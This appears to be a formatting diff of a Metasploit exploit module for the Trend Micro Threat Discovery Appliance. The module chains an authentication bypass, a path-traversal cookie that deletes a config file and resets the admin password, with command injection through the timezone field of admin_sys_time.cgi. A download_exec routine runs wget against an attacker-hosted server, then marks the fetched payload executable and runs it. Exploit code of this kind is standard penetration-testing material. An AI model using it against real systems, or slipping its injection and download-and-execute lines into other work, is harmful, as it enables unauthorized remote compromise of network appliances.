@@ -12,9 +12,11 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::FileDropper
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'        => 'Trend Micro Threat Discovery Appliance admin_sys_time.cgi Remote Command Execution',
-      'Description' => %q{
+    super(
+      update_info(
+        info,
+        'Name' => 'Trend Micro Threat Discovery Appliance admin_sys_time.cgi Remote Command Execution',
+        'Description' => %q{
           This module exploits two vulnerabilities the Trend Micro Threat Discovery Appliance.
           The first is an authentication bypass vulnerability via a file delete in logoff.cgi
           which resets the admin password back to 'admin' upon a reboot (CVE-2016-7552).
@@ -27,36 +29,38 @@ class MetasploitModule < Msf::Exploit::Remote
           module performs a heartbeat request until the box is bounced and then attempts to login
           and to perform the command injection. This module has been tested on version 2.6.1062r1
           of the appliance.
-      },
-      'Author'       =>
-        [
-          'mr_me <steventhomasseeley@gmail.com>',    # vuln + msf
-          'Roberto Suggi Liverani @malerisch',       # vuln + msf
+        },
+        'Author' => [
+          'mr_me <steventhomasseeley@gmail.com>', # vuln + msf
+          'Roberto Suggi Liverani @malerisch', # vuln + msf
         ],
-      'License'     => MSF_LICENSE,
-      'References'  =>
-        [
+        'License' => MSF_LICENSE,
+        'References' => [
           [ 'URL', 'https://asciinema.org/a/112480'], # demo
           [ 'CVE', '2016-7552'],                      # auth bypass
           [ 'CVE', '2016-7547'],                      # cmdi
         ],
-      'Platform'    => 'linux',
-      'Arch'        => ARCH_X86,
-      'Privileged'  => true,
-      'Payload'        =>
-        {
+        'Platform' => 'linux',
+        'Arch' => ARCH_X86,
+        'Privileged' => true,
+        'Payload' => {
           'DisableNops' => true,
         },
-      'Targets'     =>
-        [
+        'Targets' => [
           [ 'Trend Micro Threat Discovery Appliance 2.6.1062r1', {} ]
         ],
-      'DefaultOptions' =>
-        {
+        'DefaultOptions' => {
           'SSL' => true
         },
-      'DefaultTarget'  => 0,
-      'DisclosureDate' => '2017-04-10'))
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '2017-04-10',
+        'Notes' => {
+          'Reliability' => UNKNOWN_RELIABILITY,
+          'Stability' => UNKNOWN_STABILITY,
+          'SideEffects' => UNKNOWN_SIDE_EFFECTS
+        }
+      )
+    )
 
     register_options(
       [
@@ -66,7 +70,8 @@ class MetasploitModule < Msf::Exploit::Remote
         OptPort.new('SRVPORT', [ true, 'The daemon port to listen on', 1337 ]),
         OptBool.new('AUTHBYPASS', [ true, 'Bypass the authentication', true ]),
 
-      ])
+      ]
+    )
   end
 
   def check
@@ -74,8 +79,8 @@ class MetasploitModule < Msf::Exploit::Remote
       res = send_request_cgi({
         'uri' => normalize_uri(target_uri.path, 'cgi-bin/about.cgi'),
         'cookie' => @cookie,
-        'method' =>  'GET',
-        }, 1)
+        'method' => 'GET',
+      }, 1)
       if res and res.code == 200 and res.body =~ /About Trend Micro/
         version = "#{$1}" if res.body =~ /var ver_str = new String\("(.*)"\)/
         case version
@@ -108,13 +113,14 @@ class MetasploitModule < Msf::Exploit::Remote
     c = "session_id=../../../opt/TrendMicro/MinorityReport/etc/igsa.conf"
     res = send_request_cgi({
       'uri' => normalize_uri(target_uri.path, 'cgi-bin/logoff.cgi'),
-      'method' =>  'GET',
+      'method' => 'GET',
       'cookie' => c,
-      })
+    })
 
     if res and res.code == 200 and res.headers.to_s =~ /Backtrace/
       return true
     end
+
     return false
   end
 
@@ -148,7 +154,7 @@ class MetasploitModule < Msf::Exploit::Remote
     @pl = generate_payload_exe
     @elf_sent = false
 
-    downfile = rand_text_alpha(8+rand(8))
+    downfile = rand_text_alpha(8 + rand(8))
     resource_uri = '/' + downfile
 
     if (datastore['SRVHOST'] == "0.0.0.0" or datastore['SRVHOST'] == "::")
@@ -161,13 +167,14 @@ class MetasploitModule < Msf::Exploit::Remote
     service_url_payload = srv_host + resource_uri
 
     print_status("#{rhost}:#{rport} - Starting up our web service on #{@service_url} ...")
-    start_service({'Uri' => {
-      'Proc' => Proc.new { |cli, req|
-        on_request_uri(cli, req)
+    start_service({
+      'Uri' => {
+        'Proc' => Proc.new { |cli, req|
+          on_request_uri(cli, req)
+        },
+        'Path' => resource_uri
       },
-      'Path' => resource_uri
-    },
-    'ssl' => false # do not use SSL
+      'ssl' => false # do not use SSL
     })
 
     connect
@@ -177,16 +184,16 @@ class MetasploitModule < Msf::Exploit::Remote
     send_request_cgi({
       'uri' => normalize_uri(target_uri.path, 'cgi-bin/admin_sys_time.cgi'),
       'cookie' => @cookie,
-      'method' =>  'POST',
-        'vars_post' => {
-          'act'      => 'save',
-          'timezone' => cmd,
-        }
-      }, 1)
+      'method' => 'POST',
+      'vars_post' => {
+        'act' => 'save',
+        'timezone' => cmd,
+      }
+    }, 1)
   end
 
   def download_exec
-    @bd = rand_text_alpha(8+rand(8))
+    @bd = rand_text_alpha(8 + rand(8))
     register_file_for_cleanup("/tmp/#{@bd}")
     exec("|`wget #{@service_url} -O /tmp/#{@bd}`")
     exec("|`chmod 755 /tmp/#{@bd}`")
@@ -197,16 +204,15 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def do_login
-
     begin
       login = send_request_cgi({
         'uri' => normalize_uri(target_uri.path, 'cgi-bin/logon.cgi'),
-        'method' =>  'POST',
-          'vars_post' => {
-            'passwd'         => datastore['PASSWORD'],
-            'isCookieEnable' => 1,
-          }
-        })
+        'method' => 'POST',
+        'vars_post' => {
+          'passwd' => datastore['PASSWORD'],
+          'isCookieEnable' => 1,
+        }
+      })
 
     # these are needed due to the reboot
     rescue Rex::ConnectionRefused
